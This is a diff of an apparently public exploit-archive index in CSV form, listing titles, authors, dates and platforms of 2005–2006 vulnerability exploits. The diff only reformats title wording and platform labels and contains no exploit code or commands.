(CF_CHARSET_PATH) Buffer Overflow Privilege Escalation",2005-03-22,vade79,osx,local,0 897,platforms/php/webapps/897.cpp,"phpBB 2.0.12 - Change User Rights Authentication Bypass (C)",2005-03-24,str0ke,php,webapps,0 898,platforms/aix/local/898.sh,"AIX 5.3.0 - (invscout) Local Command Execution",2005-03-25,ri0t,aix,local,0 899,platforms/windows/dos/899.pl,"SPECTral Personal SMTP Server 0.4.2 - Denial of Service",2005-03-28,GreenwooD,windows,dos,0 @@ -843,8 +843,8 @@ id,file,description,date,author,platform,type,port 1030,platforms/php/webapps/1030.pl,"PostNuke 0.750 - readpmsg.php SQL Injection",2005-06-05,K-C0d3r,php,webapps,0 1031,platforms/php/webapps/1031.pl,"Portail PHP < 1.3 - SQL Injection",2005-06-06,"Alberto Trivero",php,webapps,0 1032,platforms/windows/local/1032.cpp,"Kaspersky AntiVirus - 'klif.sys' Privilege Escalation",2005-06-07,"Ilya Rabinovich",windows,local,0 -1033,platforms/php/webapps/1033.pl,"WordPress 1.5.1.1 - SQL Injection",2005-06-22,"Alberto Trivero",php,webapps,0 -1034,platforms/windows/local/1034.cpp,"WinZIP 8.1 - Command Line Local Buffer Overflow",2005-06-07,ATmaCA,windows,local,0 +1033,platforms/php/webapps/1033.pl,"Wordpress 1.5.1.1 - SQL Injection",2005-06-22,"Alberto Trivero",php,webapps,0 +1034,platforms/windows/local/1034.cpp,"WinZip 8.1 - Command Line Local Buffer Overflow",2005-06-07,ATmaCA,windows,local,0 1035,platforms/windows/remote/1035.c,"IPSwitch IMAP Server - LOGON Remote Stack Overflow",2005-06-07,nolimit,windows,remote,143 1036,platforms/php/webapps/1036.php,"Invision Power Board 1.3.1 - Login.php SQL Injection",2005-06-08,anonymous,php,webapps,0 1037,platforms/multiple/dos/1037.c,"Tcpdump - bgp_update_print Remote Denial of Service",2005-06-09,simon,multiple,dos,0 @@ -852,7 +852,7 @@ id,file,description,date,author,platform,type,port 1039,platforms/cgi/webapps/1039.pl,"Webhints 1.03 - Remote Command Execution Exploit (Perl) (1)",2005-06-11,Alpha_Programmer,cgi,webapps,0 1040,platforms/cgi/webapps/1040.c,"Webhints 1.03 - Remote Command Execution Exploit (C) (2)",2005-06-11,Alpha_Programmer,cgi,webapps,0 1041,platforms/cgi/webapps/1041.pl,"Webhints 1.03 - Remote Command Execution Exploit (Perl) (3)",2005-06-11,MadSheep,cgi,webapps,0 -1043,platforms/osx/local/1043.c,"Mac OS X 10.4 - launchd Race Condition Exploit",2005-06-14,intropy,osx,local,0 +1043,platforms/osx/local/1043.c,"Mac OSX 10.4 - launchd Race Condition Exploit",2005-06-14,intropy,osx,local,0 1044,platforms/aix/local/1044.c,"AIX 5.2 - netpmon Local Elevated Privileges Exploit",2005-06-14,intropy,aix,local,0 1045,platforms/aix/local/1045.c,"AIX 5.2 - ipl_varyon Local Elevated Privileges Exploit",2005-06-14,intropy,aix,local,0 1046,platforms/aix/local/1046.c,"AIX 5.2 - 'paginit' Privilege Escalation",2005-06-14,intropy,aix,local,0 @@ -867,7 +867,7 @@ id,file,description,date,author,platform,type,port 1056,platforms/multiple/dos/1056.pl,"Apache 2.0.49 - Arbitrary Long HTTP Headers Denial of Service",2005-06-20,Qnix,multiple,dos,0 1057,platforms/php/webapps/1057.pl,"Simple Machines Forum 1.0.4 - (modify) SQL Injection",2005-06-21,"James Bercegay",php,webapps,0 1058,platforms/php/webapps/1058.pl,"MercuryBoard 1.1.4 - SQL Injection",2005-06-21,RusH,php,webapps,0 -1059,platforms/php/webapps/1059.pl,"WordPress 1.5.1.1 - 'add new admin' SQL Injection",2005-06-21,RusH,php,webapps,0 +1059,platforms/php/webapps/1059.pl,"Wordpress 1.5.1.1 - 'add new admin' SQL Injection",2005-06-21,RusH,php,webapps,0 1060,platforms/php/webapps/1060.pl,"Forum Russian Board 4.2 - Full Command Execution Exploit",2005-06-21,RusH,php,webapps,0 1061,platforms/php/webapps/1061.pl,"Mambo 4.5.2.1 - SQL Injection",2005-06-21,RusH,php,webapps,0 1062,platforms/php/webapps/1062.pl,"Cacti 0.8.6d - Remote Command Execution Exploit",2005-06-22,"Alberto Trivero",php,webapps,0 @@ -880,12 +880,12 @@ id,file,description,date,author,platform,type,port 1069,platforms/php/webapps/1069.php,"UBB Threads < 6.5.2 Beta - (mailthread.php) SQL Injection",2005-06-25,mh_p0rtal,php,webapps,0 1070,platforms/asp/webapps/1070.pl,"ASPNuke 0.80 - (article.asp) SQL Injection",2005-06-27,mh_p0rtal,asp,webapps,0 1071,platforms/asp/webapps/1071.pl,"ASPNuke 0.80 - (comment_post.asp) SQL Injection",2005-06-27,"Alberto Trivero",asp,webapps,0 -1072,platforms/multiple/dos/1072.cpp,"Stream / Raped - Denial of Service Attack (Windows)",2005-06-27,"Marco Del Percio",multiple,dos,0 +1072,platforms/multiple/dos/1072.cpp,"Stream / Raped (Windows) - Denial of Service Attack",2005-06-27,"Marco Del Percio",multiple,dos,0 1073,platforms/solaris/local/1073.c,"Solaris 9 / 10 - ld.so Privilege Escalation (1)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0 1074,platforms/solaris/local/1074.c,"Solaris 9 / 10 - ld.so Privilege Escalation (2)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0 1075,platforms/windows/remote/1075.c,"Microsoft Windows Message - Queuing Buffer Overflow Universal Exploit (MS05-017) (v.0.3)",2005-06-29,houseofdabus,windows,remote,2103 1076,platforms/php/webapps/1076.py,"phpBB 2.0.15 - (highlight) Remote PHP Code Execution",2005-06-29,rattle,php,webapps,0 -1077,platforms/php/webapps/1077.pl,"WordPress 1.5.1.2 - xmlrpc Interface SQL Injection",2005-06-30,"James Bercegay",php,webapps,0 +1077,platforms/php/webapps/1077.pl,"Wordpress 1.5.1.2 - xmlrpc Interface SQL Injection",2005-06-30,"James Bercegay",php,webapps,0 1078,platforms/php/webapps/1078.pl,"XML-RPC Library 1.3.0 - (xmlrpc.php) Remote Code Injection Exploit",2005-07-01,ilo--,php,webapps,0 1079,platforms/windows/remote/1079.html,"Microsoft Internet Explorer - (javaprxy.dll) COM Object Remote Exploit",2005-07-05,k-otik,windows,remote,0 1080,platforms/php/webapps/1080.pl,"phpBB 2.0.15 - (highlight) Database Authentication Details Exploit",2005-07-03,SecureD,php,webapps,0 @@ -944,10 +944,10 @@ id,file,description,date,author,platform,type,port 1138,platforms/linux/remote/1138.c,"nbSMTP 0.99 - 'util.c' Client-Side Command Execution Exploit",2005-08-05,CoKi,linux,remote,0 1139,platforms/linux/remote/1139.c,"Ethereal 10.x - AFP Protocol Dissector Remote Format String Exploit",2005-08-06,vade79,linux,remote,0 1140,platforms/php/webapps/1140.php,"Flatnuke 2.5.5 - Remote Code Execution",2005-08-08,rgod,php,webapps,0 -1142,platforms/php/webapps/1142.php,"WordPress 1.5.1.3 - Remote Code Execution",2005-08-09,Kartoffelguru,php,webapps,0 +1142,platforms/php/webapps/1142.php,"Wordpress 1.5.1.3 - Remote Code Execution",2005-08-09,Kartoffelguru,php,webapps,0 1143,platforms/windows/dos/1143.sys,"Microsoft Windows XP SP2 - (rdpwd.sys) Remote Kernel Denial of Service",2005-08-09,"Tom Ferris",windows,dos,0 1144,platforms/windows/remote/1144.html,"Microsoft Internet Explorer - (blnmgr.dll) COM Object Remote Exploit (MS05-038)",2005-08-09,FrSIRT,windows,remote,0 -1145,platforms/php/webapps/1145.pm,"WordPress 1.5.1.3 - Remote Code Execution exploit (Metasploit)",2005-08-10,str0ke,php,webapps,0 +1145,platforms/php/webapps/1145.pm,"Wordpress 1.5.1.3 - Remote Code Execution exploit (Metasploit)",2005-08-10,str0ke,php,webapps,0 1146,platforms/windows/remote/1146.c,"Microsoft Windows - Plug-and-Play Service Remote Overflow (MS05-039)",2005-08-11,sl0ppy,windows,remote,139 1147,platforms/windows/remote/1147.pm,"Veritas Backup Exec - Remote File Access Exploit (Windows) (Metasploit)",2005-08-11,anonymous,windows,remote,10000 1149,platforms/windows/remote/1149.c,"Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (MS05-039)",2005-08-12,houseofdabus,windows,remote,445 @@ -1022,11 +1022,11 @@ id,file,description,date,author,platform,type,port 1226,platforms/php/webapps/1226.php,"phpMyFAQ 1.5.1 - (User-Agent) Remote Shell Injection Exploit",2005-09-23,rgod,php,webapps,0 1227,platforms/php/webapps/1227.php,"MailGust 1.9 - (board takeover) SQL Injection",2005-09-24,rgod,php,webapps,0 1229,platforms/linux/local/1229.sh,"Qpopper 4.0.8 (Linux) - (poppassd) Privilege Escalation",2005-09-24,kingcope,linux,local,0 -1230,platforms/bsd/local/1230.sh,"Qpopper 4.0.8 (FreeBSD)- (poppassd) Privilege Escalation",2005-09-24,kingcope,bsd,local,0 +1230,platforms/bsd/local/1230.sh,"Qpopper 4.0.8 (FreeBSD) - (poppassd) Privilege Escalation",2005-09-24,kingcope,bsd,local,0 1231,platforms/linux/remote/1231.pl,"WzdFTPD 0.5.4 - Remote Command Execution Exploit",2005-09-24,kingcope,linux,remote,21 -1232,platforms/linux/remote/1232.c,"RealPlayer/Helix Player - Remote Format String Exploit (linux)",2005-09-26,c0ntex,linux,remote,0 +1232,platforms/linux/remote/1232.c,"RealPlayer/Helix Player (Linux) - Remote Format String Exploit",2005-09-26,c0ntex,linux,remote,0 1233,platforms/multiple/dos/1233.html,"Mozilla Firefox 1.0.7 - Integer Overflow Denial of Service",2005-09-26,"Georgi Guninski",multiple,dos,0 -1234,platforms/bsd/remote/1234.c,"GNU Mailutils imap4d 0.6 - (search) Remote Format String Exploit (fbsd)",2005-09-26,"Angelo Rosiello",bsd,remote,143 +1234,platforms/bsd/remote/1234.c,"GNU Mailutils imap4d 0.6 (FreeBSD) - (search) Remote Format String Exploit",2005-09-26,"Angelo Rosiello",bsd,remote,143 1235,platforms/windows/dos/1235.c,"MultiTheftAuto 0.5 patch 1 - Server Crash and MOTD Deletion Exploit",2005-09-26,"Luigi Auriemma",windows,dos,0 1236,platforms/cgi/webapps/1236.pm,"Barracuda Spam Firewall < 3.1.18 - Command Execution Exploit (Metasploit)",2005-09-27,"Nicolas Gregoire",cgi,webapps,0 1237,platforms/php/webapps/1237.php,"PHP-Fusion 6.00.109 - (msg_send) SQL Injection",2005-09-28,rgod,php,webapps,0 @@ -1054,9 +1054,9 @@ id,file,description,date,author,platform,type,port 1260,platforms/windows/remote/1260.pm,"Microsoft Windows IIS - SA WebAgent 5.2/5.3 Redirect Overflow (Metasploit)",2005-10-19,"H D Moore",windows,remote,80 1261,platforms/hp-ux/remote/1261.pm,"HP-UX 11.11 - lpd Remote Command Execution Exploit (Metasploit)",2005-10-19,"H D Moore",hp-ux,remote,515 1262,platforms/windows/remote/1262.pm,"CA Unicenter 3.1 - CAM log_security() Stack Overflow (Metasploit)",2005-10-19,"H D Moore",windows,remote,4105 -1263,platforms/multiple/remote/1263.pl,"Veritas NetBackup 6.0 - (bpjava-msvc) Remote Exploit (linux)",2005-10-20,"Kevin Finisterre",multiple,remote,13722 -1264,platforms/windows/remote/1264.pl,"Veritas NetBackup 6.0 - (bpjava-msvc) Remote Exploit (Win32)",2005-10-20,"Kevin Finisterre",windows,remote,13722 -1265,platforms/osx/remote/1265.pl,"Veritas NetBackup 6.0 - (bpjava-msvc) Remote Exploit (OS X)",2005-10-20,"Kevin Finisterre",osx,remote,13722 +1263,platforms/multiple/remote/1263.pl,"Veritas NetBackup 6.0 (Linux) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",multiple,remote,13722 +1264,platforms/windows/remote/1264.pl,"Veritas NetBackup 6.0 (Windows/x86) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",windows,remote,13722 +1265,platforms/osx/remote/1265.pl,"Veritas NetBackup 6.0 (OSX) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",osx,remote,13722 1266,platforms/windows/dos/1266.py,"Ethereal 0.9.1 < 0.10.12 SLIMP3 - Remote Buffer Overflow PoC",2005-10-20,Sowhat,windows,dos,0 1267,platforms/linux/local/1267.c,"XMail 1.21 - (-t Command Line Option) Buffer Overflow Privilege Escalation",2005-10-20,qaaz,linux,local,0 1268,platforms/multiple/dos/1268.pl,"Net Portal Dynamic System 5.0 - (register users) Denial of Service",2005-10-21,DarkFig,multiple,dos,0 @@ -1081,7 +1081,7 @@ id,file,description,date,author,platform,type,port 1288,platforms/linux/remote/1288.pl,"Lynx 2.8.6dev.13 - Remote Buffer Overflow (port bind)",2005-11-02,xwings,linux,remote,0 1289,platforms/php/webapps/1289.php,"CuteNews 1.4.1 - (shell inject) Remote Command Execution Exploit",2005-11-03,rgod,php,webapps,0 1290,platforms/linux/remote/1290.pl,"gpsdrive 2.09 (PPC) - (friendsd2) Remote Format String Exploit",2005-11-04,"Kevin Finisterre",linux,remote,0 -1291,platforms/linux/remote/1291.pl,"gpsdrive 2.09 - (friendsd2) Remote Format String Exploit (x86)",2005-11-04,"Kevin Finisterre",linux,remote,0 +1291,platforms/linux/remote/1291.pl,"gpsdrive 2.09 (x86) - (friendsd2) Remote Format String Exploit",2005-11-04,"Kevin Finisterre",linux,remote,0 1292,platforms/multiple/remote/1292.pm,"WzdFTPD 0.5.4 - (SITE) Remote Command Execution Exploit (Metasploit)",2005-11-04,"David Maciejak",multiple,remote,21 1295,platforms/linux/remote/1295.c,"linux-ftpd-ssl 0.17 - (MKD/CWD) Remote Root Exploit",2005-11-05,kingcope,linux,remote,21 1296,platforms/php/webapps/1296.txt,"ibProArcade 2.x - module (vBulletin/IPB) SQL Injection",2005-11-06,B~HFH,php,webapps,0 @@ -1121,7 +1121,7 @@ id,file,description,date,author,platform,type,port 1343,platforms/windows/dos/1343.c,"Microsoft Windows Metafile - (gdi32.dll) Denial of Service (MS05-053)",2005-11-29,"Winny Thomas",windows,dos,0 1345,platforms/php/dos/1345.php,"Xaraya 1.0.0 RC4 - create() Denial of Service",2005-11-29,rgod,php,dos,0 1346,platforms/windows/dos/1346.c,"Microsoft Windows Metafile - (mtNoObjects) Denial of Service (MS05-053)",2005-11-30,"Winny Thomas",windows,dos,0 -1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 - (phgrafx) Local Buffer Overflow (x86)",2005-11-30,"p. minervini",qnx,local,0 +1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 (x86) - (phgrafx) Local Buffer Overflow",2005-11-30,"p. minervini",qnx,local,0 1352,platforms/windows/remote/1352.cpp,"Microsoft Windows - DTC Remote Exploit (PoC) (MS05-051) (2)",2005-12-01,Swan,windows,remote,0 1353,platforms/windows/dos/1353.py,"WinEggDropShell 1.7 - Multiple Pre-Authenticated Remote Stack Overflow PoC",2005-12-02,Sowhat,windows,dos,0 1354,platforms/php/webapps/1354.php,"Zen Cart 1.2.6d - (password_forgotten.php) SQL Injection",2005-12-02,rgod,php,webapps,0 @@ -1209,7 +1209,7 @@ id,file,description,date,author,platform,type,port 1461,platforms/php/webapps/1461.pl,"Invision Power Board Dragoran Portal Mod 1.3 - SQL Injection",2006-01-31,SkOd,php,webapps,0 1462,platforms/windows/remote/1462.cpp,"Sami FTP Server 2.0.1 - Remote Buffer Overflow (cpp)",2006-01-31,HolyGhost,windows,remote,21 1463,platforms/windows/remote/1463.pm,"SoftiaCom WMailserver 1.0 - SMTP Remote Buffer Overflow (Metasploit)",2006-02-01,y0,windows,remote,21 -1464,platforms/hardware/dos/1464.c,"Arescom NetDSL-1000 - (telnetd) Remote Denial of Service",2006-02-02,"Fabian Ramirez",hardware,dos,0 +1464,platforms/hardware/dos/1464.c,"Arescom NetDSL-1000 - (TelnetD) Remote Denial of Service",2006-02-02,"Fabian Ramirez",hardware,dos,0 1465,platforms/windows/local/1465.c,"Microsoft Windows - ACLs Privilege Escalation (2)",2006-02-12,"Andres Tarasco",windows,local,0 1466,platforms/windows/remote/1466.pl,"eXchange POP3 5.0.050203 - (rcpt to) Remote Buffer Overflow",2006-02-03,"securma massine",windows,remote,25 1467,platforms/php/webapps/1467.php,"LoudBlog 0.4 - (path) Arbitrary Remote File Inclusion Exploit",2006-02-03,rgod,php,webapps,0 @@ -1217,9 +1217,9 @@ id,file,description,date,author,platform,type,port 1469,platforms/php/webapps/1469.pl,"phpBB 2.0.19 - (Style Changer/Demo Mod) SQL Injection",2006-02-05,SkOd,php,webapps,0 1470,platforms/windows/local/1470.c,"Microsoft HTML Help Workshop - (.hhp) Buffer Overflow",2006-02-06,bratax,windows,local,0 1471,platforms/cgi/webapps/1471.pl,"MyQuiz 1.01 - (PATH_INFO) Arbitrary Command Execution Exploit",2006-02-06,Hessam-x,cgi,webapps,0 -1472,platforms/asp/webapps/1472.pl,"ASPThai.Net Guestbook 5.5 - (Authentication Bypass) SQL Injection",2006-02-06,Zodiac,asp,webapps,0 +1472,platforms/asp/webapps/1472.pl,"ASPThai.Net GuestBook 5.5 - (Authentication Bypass) SQL Injection",2006-02-06,Zodiac,asp,webapps,0 1473,platforms/hardware/dos/1473.c,"Sony/Ericsson Bluetooth - (Reset Display) Denial of Service",2006-02-06,"Pierre Betouin",hardware,dos,0 -1474,platforms/linux/remote/1474.pm,"Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (Linux) (Metasploit)",2006-02-07,"H D Moore",linux,remote,0 +1474,platforms/linux/remote/1474.pm,"Mozilla Firefox 1.5 (Linux) - location.QueryInterface() Code Execution (Metasploit)",2006-02-07,"H D Moore",linux,remote,0 1475,platforms/windows/dos/1475.html,"Microsoft Internet Explorer 7.0 Beta 2 - (urlmon.dll) Denial of Service",2006-02-07,"Tom Ferris",windows,dos,0 1478,platforms/php/webapps/1478.php,"CPGNuke Dragonfly 9.0.6.1 - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0 1479,platforms/qnx/local/1479.sh,"QNX Neutrino 6.2.1 - (phfont) Race Condition Privilege Escalation",2006-02-08,kokanin,qnx,local,0 @@ -1260,7 +1260,7 @@ id,file,description,date,author,platform,type,port 1516,platforms/php/webapps/1516.php,"ilchClan 1.05g - (tid) SQL Injection",2006-02-20,x128,php,webapps,0 1517,platforms/php/dos/1517.c,"PunBB 2.0.10 - (Register Multiple Users) Denial of Service",2006-02-20,K4P0,php,dos,0 1518,platforms/linux/local/1518.c,"MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Privilege Escalation",2006-02-20,"Marco Ivaldi",linux,local,0 -1519,platforms/osx/remote/1519.pm,"Mac OS X Safari Browser - (Safe File) Remote Code Execution Exploit (Metasploit)",2006-02-22,"H D Moore",osx,remote,0 +1519,platforms/osx/remote/1519.pm,"Mac OSX Safari Browser - (Safe File) Remote Code Execution Exploit (Metasploit)",2006-02-22,"H D Moore",osx,remote,0 1520,platforms/windows/remote/1520.pl,"Microsoft Windows Media Player - Plugin Overflow (MS06-006) (3)",2006-02-22,"Matthew Murphy",windows,remote,0 1521,platforms/php/webapps/1521.php,"Noahs Classifieds 1.3 - (lowerTemplate) Remote Code Execution",2006-02-22,trueend5,php,webapps,0 1522,platforms/php/webapps/1522.php,"NOCC Webmail 1.0 - (Local Inclusion) Remote Code Execution Exploit",2006-02-23,rgod,php,webapps,0 @@ -1286,7 +1286,7 @@ id,file,description,date,author,platform,type,port 1542,platforms/php/webapps/1542.pl,"phpRPC Library 0.7 - XML Data Decoding Remote Code Execution",2006-03-01,LorD,php,webapps,0 1543,platforms/php/webapps/1543.pl,"vuBB 0.2 - (Cookie) Final SQL Injection Exploit (mq=off)",2006-03-01,KingOfSka,php,webapps,0 1544,platforms/php/webapps/1544.pl,"Woltlab Burning Board 2.x - Datenbank MOD (fileid) SQL Injection",2006-03-01,nukedx,php,webapps,0 -1545,platforms/osx/local/1545.pl,"Apple Mac OS X - (/usr/bin/passwd) Custom Passwd Privilege Escalation",2006-03-01,vade79,osx,local,0 +1545,platforms/osx/local/1545.pl,"Apple Mac OSX - (/usr/bin/passwd) Custom Passwd Privilege Escalation",2006-03-01,vade79,osx,local,0 1546,platforms/php/webapps/1546.pl,"phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (2)",2006-03-02,cijfer,php,webapps,0 1547,platforms/php/webapps/1547.txt,"Aztek Forum 4.00 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities (PoC)",2006-03-02,lorenzo,php,webapps,0 1548,platforms/php/webapps/1548.pl,"MyBulletinBoard (MyBB) 1.04 - (misc.php COMMA) SQL Injection (2)",2006-03-03,Devil-00,php,webapps,0 @@ -1322,7 +1322,7 @@ id,file,description,date,author,platform,type,port 1579,platforms/linux/local/1579.pl,"Ubuntu 5.10 - Installer Password Disclosure",2006-03-12,"Kristian Hermansen",linux,local,0 1581,platforms/php/webapps/1581.pl,"Simple PHP Blog 0.4.7.1 - Remote Command Execution Exploit",2006-03-13,rgod,php,webapps,0 1582,platforms/linux/remote/1582.c,"crossfire-server 1.9.0 - SetUp() Remote Buffer Overflow",2006-03-13,landser,linux,remote,13327 -1583,platforms/osx/remote/1583.pl,"Apple Mac OS X 10.4.5 Mail.app - (Real Name) Buffer Overflow",2006-03-13,"Kevin Finisterre",osx,remote,25 +1583,platforms/osx/remote/1583.pl,"Apple Mac OSX 10.4.5 Mail.app - (Real Name) Buffer Overflow",2006-03-13,"Kevin Finisterre",osx,remote,25 1584,platforms/windows/local/1584.cpp,"Microsoft Windows - Telephony Service Command Execution Exploit (MS05-040)",2006-03-14,"Cesar Cerrudo",windows,local,0 1585,platforms/php/webapps/1585.php,"php iCalendar 2.21 - (Cookie) Remote Code Execution Exploit",2006-03-15,rgod,php,webapps,0 1586,platforms/php/webapps/1586.php,"php iCalendar 2.21 - (publish.ical.php) Remote Code Execution Exploit",2006-03-15,rgod,php,webapps,0 @@ -1365,7 +1365,7 @@ id,file,description,date,author,platform,type,port 1623,platforms/asp/webapps/1623.pl,"EzASPSite 2.0 RC3 - (Scheme) SQL Injection",2006-03-29,nukedx,asp,webapps,0 1624,platforms/tru64/local/1624.pl,"Tru64 UNIX 5.0 - (Rev. 910) rdist NLSPATH Buffer Overflow",2006-03-29,"Kevin Finisterre",tru64,local,0 1625,platforms/tru64/local/1625.pl,"Tru64 UNIX 5.0 - (Rev. 910) edauth NLSPATH Buffer Overflow",2006-03-29,"Kevin Finisterre",tru64,local,0 -1626,platforms/windows/remote/1626.pm,"PeerCast 0.1216 - Remote Buffer Overflow (Win32) (Metasploit)",2006-03-30,"H D Moore",windows,remote,7144 +1626,platforms/windows/remote/1626.pm,"PeerCast 0.1216 - Remote Buffer Overflow (Metasploit)",2006-03-30,"H D Moore",windows,remote,7144 1627,platforms/php/webapps/1627.php,"Claroline 1.7.4 - (scormExport.inc.php) Remote Code Execution Exploit",2006-03-30,rgod,php,webapps,0 1628,platforms/windows/remote/1628.cpp,"Microsoft Internet Explorer - (createTextRang) Download Shellcoded Exploit (2)",2006-03-31,ATmaCA,windows,remote,0 1629,platforms/php/webapps/1629.pl,"SQuery 4.5 - (libpath) Remote File Inclusion Exploit",2006-04-01,uid0,php,webapps,0 @@ -1390,7 +1390,7 @@ id,file,description,date,author,platform,type,port 1655,platforms/php/webapps/1655.php,"XBrite Members 1.1 - 'id' SQL Injection",2006-04-09,snatcher,php,webapps,0 1656,platforms/php/webapps/1656.txt,"Sire 2.0 - (lire.php) Remote File Inclusion / Arbitrary File Upload",2006-04-09,simo64,php,webapps,0 1657,platforms/linux/dos/1657.asm,"Linux Kernel 2.6.x - sys_timer_create() Local Denial of Service",2006-04-09,fingerout,linux,dos,0 -1659,platforms/php/webapps/1659.php,"PHPList 2.10.2 - GLOBALS[] Remote Code Execution Exploit",2006-04-10,rgod,php,webapps,0 +1659,platforms/php/webapps/1659.php,"phpList 2.10.2 - GLOBALS[] Remote Code Execution Exploit",2006-04-10,rgod,php,webapps,0 1660,platforms/php/webapps/1660.pm,"Horde 3.0.9/3.1.0 - (Help Viewer) Remote Code Execution (Metasploit)",2006-04-10,Inkubus,php,webapps,0 1661,platforms/php/webapps/1661.pl,"phpBB 2.0.19 - (user_sig_bbcode_uid) Remote Code Execution Exploit",2006-04-10,RusH,php,webapps,0 1662,platforms/php/webapps/1662.php,"Clansys 1.1 (showid) - SQL Injection",2006-04-10,snatcher,php,webapps,0 @@ -1432,10 +1432,10 @@ id,file,description,date,author,platform,type,port 1709,platforms/multiple/dos/1709.txt,"OpenTTD 0.4.7 - Multiple Vulnerabilities",2006-04-23,"Luigi Auriemma",multiple,dos,0 1710,platforms/php/webapps/1710.txt,"Clansys 1.1 - 'index.php' PHP Code Insertion",2006-04-23,nukedx,php,webapps,0 1711,platforms/php/webapps/1711.txt,"Built2Go PHP Movie Review 2B - Remote File Inclusion",2006-04-23,"Camille Myers",php,webapps,0 -1712,platforms/osx/dos/1712.html,"Apple Mac OS X Safari 2.0.3 (417.9.2) - Multiple Vulnerabilities",2006-04-24,"Tom Ferris",osx,dos,0 +1712,platforms/osx/dos/1712.html,"Apple Mac OSX Safari 2.0.3 (417.9.2) - Multiple Vulnerabilities",2006-04-24,"Tom Ferris",osx,dos,0 1713,platforms/php/webapps/1713.pl,"FlexBB 0.5.5 - (function/showprofile.php) SQL Injection",2006-04-24,Devil-00,php,webapps,0 1714,platforms/asp/webapps/1714.txt,"BK Forum 4.0 - (member.asp) SQL Injection",2006-04-24,n0m3rcy,asp,webapps,0 -1715,platforms/osx/dos/1715.html,"Apple Mac OS X Safari 2.0.3 - (417.9.2) (ROWSPAN) Denial of Service PoC",2006-04-24,"Yannick von Arx",osx,dos,0 +1715,platforms/osx/dos/1715.html,"Apple Mac OSX Safari 2.0.3 - (417.9.2) (ROWSPAN) Denial of Service PoC",2006-04-24,"Yannick von Arx",osx,dos,0 1716,platforms/multiple/dos/1716.html,"Mozilla Firefox 1.5.0.2 - (js320.dll/xpcom_core.dll) Denial of Service PoC",2006-04-24,splices,multiple,dos,0 1717,platforms/linux/remote/1717.c,"Fenice Oms 1.10 - (long get request) Remote Buffer Overflow",2006-04-25,c0d3r,linux,remote,0 1718,platforms/hardware/dos/1718.pl,"OCE 3121/3122 Printer - (parser.exe) Denial of Service",2006-04-26,sh4d0wman,hardware,dos,0 @@ -1525,7 +1525,7 @@ id,file,description,date,author,platform,type,port 1812,platforms/php/webapps/1812.pl,"Fusion News 1.0 (fil_config) - Remote File Inclusion",2006-05-21,X0r_1,php,webapps,0 1813,platforms/linux/remote/1813.c,"Cyrus IMAPD 2.3.2 - (pop3d) Remote Buffer Overflow",2006-05-21,kingcope,linux,remote,110 1814,platforms/php/webapps/1814.txt,"UBB Threads 6.4.x-6.5.2 - (thispath) Remote File Inclusion",2006-05-22,V4mu,php,webapps,0 -1815,platforms/linux/dos/1815.c,"portmap 5 beta - (Set/Dump) Local Denial of Service",2006-05-22,"Federico L. Bossi Bonin",linux,dos,0 +1815,platforms/linux/dos/1815.c,"portmap 5 Beta - (Set/Dump) Local Denial of Service",2006-05-22,"Federico L. Bossi Bonin",linux,dos,0 1816,platforms/php/webapps/1816.php,"Nucleus CMS 3.22 - (DIR_LIBS) Arbitrary Remote File Inclusion Exploit",2006-05-23,rgod,php,webapps,0 1817,platforms/php/webapps/1817.txt,"Docebo 3.0.3 - Multiple Remote File Inclusion",2006-05-23,Kacper,php,webapps,0 1818,platforms/php/webapps/1818.txt,"phpCommunityCalendar 4.0.3 - Multiple (Cross-Site Scripting / SQL Injection) Vulnerabilities",2006-05-23,X0r_1,php,webapps,0 @@ -1600,7 +1600,7 @@ id,file,description,date,author,platform,type,port 1889,platforms/hardware/remote/1889.txt,"D-Link Access-Point 2.10na - (DWL Series) Config Disclosure",2006-06-08,INTRUDERS,hardware,remote,0 1890,platforms/php/webapps/1890.txt,"CMS-Bandits 2.5 - (spaw_root) Remote File Inclusion",2006-06-08,"Federico Fazzi",php,webapps,0 1891,platforms/php/webapps/1891.txt,"Enterprise Payroll Systems 1.1 - (footer) Remote File Inclusion",2006-06-08,Kacper,php,webapps,0 -1892,platforms/php/webapps/1892.pl,"Guestex Guestbook 1.00 - (email) Remote Code Execution Exploit",2006-06-08,K-sPecial,php,webapps,0 +1892,platforms/php/webapps/1892.pl,"Guestex GuestBook 1.00 - (email) Remote Code Execution Exploit",2006-06-08,K-sPecial,php,webapps,0 1893,platforms/asp/webapps/1893.txt,"MailEnable Enterprise 2.0 - (ASP) Multiple Vulnerabilities",2006-06-09,"Soroush Dalili",asp,webapps,0 1894,platforms/linux/dos/1894.py,"0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash PoC",2006-06-09,"Federico Fazzi",linux,dos,0 1895,platforms/php/webapps/1895.txt,"empris r20020923 - (phormationdir) Remote File Inclusion",2006-06-10,Kacper,php,webapps,0 @@ -1650,7 +1650,7 @@ id,file,description,date,author,platform,type,port 1939,platforms/php/webapps/1939.php,"DataLife Engine 4.1 - SQL Injection Exploit (PHP)",2006-06-21,RusH,php,webapps,0 1940,platforms/windows/remote/1940.pm,"Microsoft Windows RRAS - Remote Stack Overflow (MS06-025) (Metasploit)",2006-06-22,"H D Moore",windows,remote,445 1941,platforms/php/webapps/1941.php,"Mambo 4.6rc1 - (Weblinks) Blind SQL Injection Exploit (2)",2006-06-22,rgod,php,webapps,0 -1942,platforms/php/webapps/1942.txt,"ralf image gallery 0.7.4 - Multiple Vulnerabilities",2006-06-22,Aesthetico,php,webapps,0 +1942,platforms/php/webapps/1942.txt,"ralf image Gallery 0.7.4 - Multiple Vulnerabilities",2006-06-22,Aesthetico,php,webapps,0 1943,platforms/php/webapps/1943.txt,"Harpia CMS 1.0.5 - Remote File Inclusion",2006-06-22,Kw3[R]Ln,php,webapps,0 1944,platforms/windows/local/1944.c,"Microsoft Excel - Unspecified Remote Code Execution Exploit",2006-06-22,"naveed afzal",windows,local,0 